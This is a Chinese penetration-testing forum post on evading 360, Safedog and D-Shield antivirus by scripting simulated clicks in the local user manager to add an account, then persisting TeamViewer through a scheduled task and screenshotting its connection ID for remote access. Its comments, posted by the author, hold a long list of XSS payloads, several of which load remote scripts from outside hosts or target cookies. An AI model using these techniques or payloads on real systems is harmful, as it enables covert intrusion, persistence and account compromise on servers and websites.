Bypass AVs to Add Users

TheKingOfDuck 渗透测试 15015浏览 · 2019-02-16 01:45

0x01 About

嗯这是一个企图Uninstall All AVs失败的产物

基本思路是模拟点击输入

通过下面指令可运行360的卸载程序

cd "C:/Program Files/360/360safe/" & start uninst.exe

这程序的按钮有两个ShadowEdge保护

直接运行py脚本取点击会被拒绝

新建一个bat再用start来启动就可以绕过了

http://v.youku.com/v_show/id_XNDA1NzEyMzkyMA==.html?spm=a2h3j.8428770.3416059.1

如视频所示模拟点击处最终确认按钮后无法点击

查阅资料得知这尼玛是360SPTools.exe设了很多阻碍搞一天没突破

回念一想不如直接添加用户才有了本文

0x02 server

为了方便修改调整采用Python做了本次任务的不是每个目标上都有py的环境所以手动配置咯

直接上传或使用下面脚本下载Python的embeddable版本到服务器（脚本不支持https 改半天实在没办法需到Py官网下载后再上传到http的服务器上带解压）

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/download.php

由于需要用到pywin32模块该模块无法使用pip安装所以顺便安装一下

pip：

start python.exe ../get-pip.py

（踩坑经验：先修改环境目录下的python37._pth文件，去掉 #import site 前的注释再执行命令否则也无法安装成功不使用start来运行也安装不成功）

pywin32：

start python.exe -m pip install pywin32

执行完所有需要的依赖也就安装好了无需GUI即可完成。

0x03 AddUsers

刚开始是想通过控制面板添加用户可以通过脚本执行control userpasswords打开控制面板但是步骤不叫繁琐而且进程是explore 窗口不好控制。

可通过lusrmgr.msc（本地用户和组管理工具）来做。

打开后需要计算图中中间那个"用户"按钮的位置经过测试发现它到顶端的距离和到坐标的距离无人为调整的话是不会边的所有可获取该窗口左上角点的坐标来计算其坐标

#输出MMCMainFrame的窗口名称
MMCMainFrame = win32gui.FindWindow("MMCMainFrame", None)
# print("#######################")
titlename = (win32gui.GetWindowText(MMCMainFrame))
# print(titlename)
# print("#######################")

hWndChildList = []
a = win32gui.EnumChildWindows(MMCMainFrame, lambda hWnd, param: param.append(MMCMainFrame),  hWndChildList)
# print(a)

#获取窗口左上角和右下角坐标
a, b, c, d = win32gui.GetWindowRect(MMCMainFrame)

a, b,即为需要的值

# 计算得出MMCMainFrame窗口的顶边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 237 -117
# print(userPosL)
# userPosL = 120
#计算得出MMCMainFrame窗口的坐标边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 1145 - 915
# print(userPosH)
# userPosH = 230

(a + 230, b + 120 )即为需要的值实战中如有出入可采用PIL模块截图回传下来计算。

剩下的就是常规的模拟点击模拟输入完整代码见：

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/adduser.py

0x03 Test

360全家桶安全狗 D盾：

原视频在附件压缩包：

http://v.youku.com/v_show/id_XNDA1NzEyNTc1Ng==.html?spm=a2h3j.8428770.3416059.1

（云锁要求必须在服务区上安装故尚未测试）

0x03 Summary

添加用户后如果服务器没开3389可上传一个单文件版本的teamviewer
再通过下面指令运行起来

schtasks /create /sc minute /mo 1 /tn “cat” /tr TV的路径  /ru 创建的用户名 /rp 创建的密码

使用PIL截图获取连接ID密码：

from PIL import ImageGrab
im = ImageGrab.grab()
im.save('screenshot.png')

如此一来就不用任何0day 全程合法文件的取得了远程桌面的权限。

3 人收藏 1 人喜欢

转载

7 条评论

某人

表情

: TheKingOfDuck
2019-03-09 11:19 0 回复

<svg><style>{font-family:'<iframe/onload=confirm(1)>'</style></svg>

<input/onmouseover="javaSCRIPT:confirm(1)"

<svg><scRipt %00>alert(1) {Opera}</svg>

<img/src=%00 onerror=this.onerror=confirm

<form><isindex formaction="javascript:confirm(1)"

<img src=%00
onerror=alert(1)

<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>

<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?

iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="

<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg onload=alert(1)>"

<meta content="
1
; JAVASCRIPT: alert(1)" http-equiv="refresh">

<svg><script xlink:href=data:,window.open('https://www.blog.zsec.uk/')></script</svg>

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</svg>

<meta content="0;url=javascript:confirm(1)" http-equiv="refresh">

<iframe src=javascript:alert(document.location)>

X

</script><img/%00/src="worksinchrome:prompt(1)"/%00/onerror='eval(src)'>

<img/
src=~ onerror=prompt(1)>

<iframe
src="javascript:alert(1)"
;>

<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[�]"� onmouseover=prompt(1)//">XYZ</a

<img/src=@
onerror = prompt('1')

<style/onload=prompt('XSS'&#41

<script ^__^>alert(String.fromCharCode(49))</script

</style ><script :-(>//alert(document.location)//</script :-(

�</form><input type="date" onfocus="alert(1)">

<textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>

<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //

<iframe srcdoc="<body onload=prompt(1)>"><br>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a></p>
<p><script <del>~>alert(0%0)</script ~</del>></p>
<p><style/onload=</p>
<p><script src="data:text/javascript,alert(1)"></script></p>
<p><iframe/src \/\/onload = prompt(1)</p>
<p><iframe/onreadystatechange=alert(1)</p>
<p><svg/onload=alert(1)</p>
<p><input value=<><iframe/src=javascript:confirm(1)</p>
<p><input type="text" value=`` <div/onmouseover='alert(1)'>X</div><br>
<a href="http://www">http://www</a>.<script>alert(1)</script .com</p>
<p><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe></p>
<p><svg><script ?>alert(1)</p>
<p><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe><br>
<img src=<code>xx:xx</code>onerror=alert(1)></p>
<p><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object></p>
<p><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/></p>
<p><math><a xlink:href="//jsfiddle.net/t846h/">click</p>
<p><embed code="<a href="http://businessinfo.co.uk/labs/xss/xss.swf">http://businessinfo.co.uk/labs/xss/xss.swf</a>" allowscriptaccess=always></p>
<p><svg contentScriptType=text/vbs><script>MsgBox<br>
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a</p>
<p><iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE></p>
<p><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U</p>
<p><script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F</p>
<p><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script</p>
<p><object data=javascript&colon;\u0061l&#101%72t(1)></p>
<p><script>++1-+?(1)</script></p>
<p><body/onload=<!-->&#10alert(1)></p>
<p><script itworksinallbrowsers>/<em><script</em> */alert(1)</script<br>
<img src ?itworksonchrome?\/onerror = alert(1)</p>
<p><svg><script>//&NewLine;confirm(1);</script </svg></p>
<p><svg><script onlypossibleinopera:-)> alert(1)<br>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe</p>
<p><script x> alert</script 1=2</p>
<p><div/onmouseover='alert(1)'> style="x:"><br>
<--<code><img/src=</code> onerror=alert(1)> --!></p>
<p><a href="script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)">script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)</a></script></p>
<p><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button><br>
"><img src=x onerror=window.open('<a href="https://www.zsec.uk');>">https://www.zsec.uk');></a></p>
<p><form><button formaction=javascript&colon;alert(1)>CLICKME</p>
<p><math><a xlink:href="//blog.zsec.uk">click</p>
<p><object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object></p>
<p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

1Click Me

'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E

<scr\0ipt/src=http://xss.com/xss.js</script

%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E

' onmouseover=alert(/Black.Spook/)

">iframe%20src="http://blog.zsec.uk"%%203E
'<scriptwindow.onload=function(){document.forms[0].message.value='1';}</script>

x”</title><img src%3dx onerror%3dalert(1)>

</form>

TheKingOfDuck

2019-03-09 11:18 0 回复

<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>

<<script>alert("XSS");//<</script>

<SCRIPT SRC=http://blog.zsec.uk/xss.js?

<SCRIPT SRC=//blog.zsec.uk/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://blog.zsec.uk/scriptlet.html <

<script>a=/XSS/
alert(a.source)</script>

";alert('XSS');//

</TITLE><script>alert("XSS");</script>

<input src="javascript:alert('XSS');" type="IMAGE">

<BODY ONLOAD=alert('XSS')>

<bgsound src="javascript:alert('XSS');"></bgsound>

<layer src="http://blog.zsec.uk/
scriptlet.html"></layer>

<link href="javascript:alert('XSS');" rel="stylesheet">

<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>

<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">

<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>

<xss style="behavior: url(xss.htc);"></xss>

<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
XSS

<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">

<meta content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" http-equiv="refresh">

<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">

<iframe src="javascript:alert('XSS');"></iframe>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<xss style="xss:expression(alert('XSS'))">

exp/<A STYLE='no\xss:noxss("**");

xss:ex/XSS*//**pression(alert("XSS"))'></xss>

<style type="text/javascript">alert('XSS');</style>

<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>

<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>



<base href="javascript:alert('XSS');//">

<object data="http://blog.zsec.uk/scriptlet.html" type="text/x-scriptlet"></object>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

<embed allowscriptaccess="always" src="http://blog.zsec.uk/xss.swf">

<HTML xmlns:xss>

<?import namespace="xss" implementation="http://blog.zsec.uk/xss.htc">

xss:xssXSS/xss:xss

</HTML>

<XML ID=I><x><c>]]>
</c></x></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml>

<XML SRC="xsstest.xml" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

</BODY></HTML>

<script src="http://blog.zsec.uk/xss.jpg"></script>

<meta content="USERID=<SCRIPT>alert('XSS')</SCRIPT>" http-equiv="Set-Cookie">

<meta content="text/html; charset=UTF-7" http-equiv="CONTENT-TYPE"> <script>alert('XSS');</script>

<script a=">" src="http://blog.zsec.uk/xss.js"></script>

<SCRIPT =">" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://blog.zsec.uk/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>

<SCRIPT a=> SRC="http://blog.zsec.uk/xss.js"></SCRIPT>

<script a=">'>" src="http://blog.zsec.uk/xss.js"></script>

<script>document.write("<SCRI");</script>PT SRC="http://blog.zsec.uk/xss.js"></SCRIPT>

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

XSS

<iframe %00 src=" javascript:prompt(1) "%00>

TheKingOfDuck

2019-03-09 11:17 0 回复

'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X nS nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<input src="javascript:alert('XSS');" type="IMAGE">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

SCRIPT/SRC="http://blog.zsec.uk/xss.js"</SCRIPT>

<<script>alert("XSS");//<</script>

<IMG SRC="javascript:alert('XSS')"

XSS</br>

<BODY ONLOAD=alert('XSS')>

<bgsound src="javascript:alert('XSS');"></bgsound>

<link href="javascript:alert('XSS');" rel="stylesheet">

<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>

<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">

<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>

<STYLE>@import'javascript:alert("XSS")';</STYLE>

<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>

<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>

<xss style="xss:expression(alert('XSS'))"></xss>

<xss style="behavior: url(xss.htc);">

<a href="javascript:alert(-1)">hello</a>

<a href="javascript:alert(-1)"

Hello

<a <!-- href="javascript:alert(31337);">Hello</a>

<map name="planetmap"><area a-=">" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

" onhover="javascript:alert(-1)"

"><script>alert('test')</script>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><script>alert(String.fromCharCode(88,83,83))</script>

<SCRIPT SRC=http://blog.zsec.uk/xss.js></SCRIPT>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=javascript:alert("RSnake says, 'XSS'")>

<IMG """><script>alert("XSS")</script>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG

SRC

"

j

a

v

a

s

c

r

i

p

t

:

a

l

e

r

t

(

'

X

S

S

'

)

"

>

TheKingOfDuck

2019-03-09 11:16 0 回复

No dos expression vector <i style=x:expression(alert(URL=1))>

Vbscript XHR by @masa141421356

XML Entity XSS by @garethheyes

Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa

<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes

IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke

<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D

name Classic html entity inject vector

A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript

<font style="color:expression(alert(document.cookie))">
<iframe<?php chr(11)?="" echo=""> onload=alert('XSS')>
"><script alert(string.fromcharcode(88,83,83))<="" script="">
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee>

XSS

</marquee>
<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">
<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">
<script>var var = 1; alert(var)</script>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
alert("XSS")'?>

" onfocus=alert(document.domain) "> <"

<style>li {list-style-image: url("javascript:alert('XSS')");}</style>

XSS
perl -e 'print "<scr\0ipt>alert("XSS")</scr\0ipt>";' > out
perl -e 'print "";' > out

<scrscriptipt>alert(1)</scrscriptipt>

<script>alert(1)</script>
<script>document.write("XSS");</script>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
='><script>alert("xss")</script>
<form action="javas cript:alert(1)">
<label>This is a searchable index. Enter search keywords: <input name="isindex" type="image"></label>
</form>
<script?=">"?="yoursite.com/xss.js?69,69">
<script>alert(navigator.userAgent)</script>>
">/XaDoS/><script>alert(document.cookie)</script>
<script> src="www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="www.site.com/XSS.js">
">
[color=red width=expression(alert(123))][color]
<base href="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"><script>alert(123)</script></script?=">

</iframe<?php></font>

: TheKingOfDuck
2019-03-09 11:16 0 回复

IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day

new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri

<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox

<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE

"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato

Components.lookupMethod(self, 'alert')(1) #firefox

external.NavigateAndFind(' ',[],[]) #IE #URLredirect

<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke

<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera

<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome

<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg></ y="><x" onload=alert('@0x6D6172696F')> #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=<>@mozilla.org/js/function</>;$::<a href="/@superevr/"><>alert</></a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location=&#60&#62javascript&#x3A;alert(1)&#60&#33&#47></script> #Firefox #JustForFun

Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>

<style>//*{x:expression(alert(/@jackmasa/))}//<style></style>

<input #ie="" #xss<br="" >="" value="--><body/onload=<code>alert(/ @jackmasa /)//</code>">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))> target it.

Firefox clipboard-hijack without script and css : http://

<![<img src=x:x onerror=alert(/ @jackmasa /)//]-->

E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes

vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356

({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()

No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>

<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>

VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]

if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console

<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>

![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa

<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>

<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS

document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS

header('Refresh: 0;url=javascript:alert(1)');

<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">

click

CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>

ES #FF for(location of ['javascript:alert(/ff/)']);

E4X function::['location']='javascript'':alert(/FF/)'

HTML5 entity char test

Firefox click <script>eval(test'')</script> by @cgvwzq

CSS and CSS :P

toUpperCase XSS document.write('<ı onclıck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</ı>'.toUpperCase()) by @jackmasa

IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356

aha <script src=>alert(/IE|Opera/)</script>

Opera bug? <img src=//\ onload=alert(1)>

Use 127.1 no 127.0.0.1 by @jackmasa

IE vector location='&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'

jQuery super less-xss,work in IE: $(URL) 6 chars

Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap

innerText DOM XSS: innerHTML=innerText

Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.

jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')

IE all version CSRF vector <img lowsrc=//blog.zsec.uk>

Timing vector <img src=//ixss.sinaapp.com/sleep.php>

Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"><br>
IE9 <script/onload=alert(1)></script><br>
Webkit and FF <style/onload=alert(1)><br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356<br>
Firefox <img src=javascript:while([{}]);><br>
IE  by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script><br>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop</p>
<p><button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking <img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F

DOM clobbering:<form name=location > clobbered location object on IE.

DOM clobbering:<form name=document><image name=body> clobbered document->body

<isindex formaction=javascript:alert(1)> by @jackmasa

Classic IE backtick DOM XSS: <script>document.body.innerHTML=''</script>

Firefox click=>google by @garethheyes

click by @kkotowicz

Opera click variant base64 encode. by @jackmasa

Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>

Webkit and Opera click

FF click url trick by @jackmasa

IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat

<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F

click

FF no referrer by @sneak_

: TheKingOfDuck
2019-03-09 11:13 0 回复

test：

"/><img src=x onerror=alert('test')/>

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/

javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/

javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/

--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</script>

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> / alert(1)//

'">><marquee></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/

javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/

javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/

